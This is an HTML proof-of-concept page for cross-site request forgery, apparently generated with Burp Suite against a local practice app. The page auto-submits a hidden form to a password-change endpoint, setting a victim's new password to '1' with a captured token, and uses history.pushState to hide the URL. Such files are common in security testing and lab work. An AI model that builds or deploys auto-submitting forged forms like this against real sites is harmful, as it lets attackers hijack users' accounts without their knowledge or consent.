<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/nap/csrf/POST-change.php" method="POST">
      <input type="hidden" name="token" value="619d3101195085b31604692d9fbeb074cd542058b2f22ce1bb8f25044bc9c2a8" />
      <input type="hidden" name="password&#95;new" value="1" />
      <input type="hidden" name="password&#95;conf" value="1" />
      <input type="hidden" name="change" value="change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
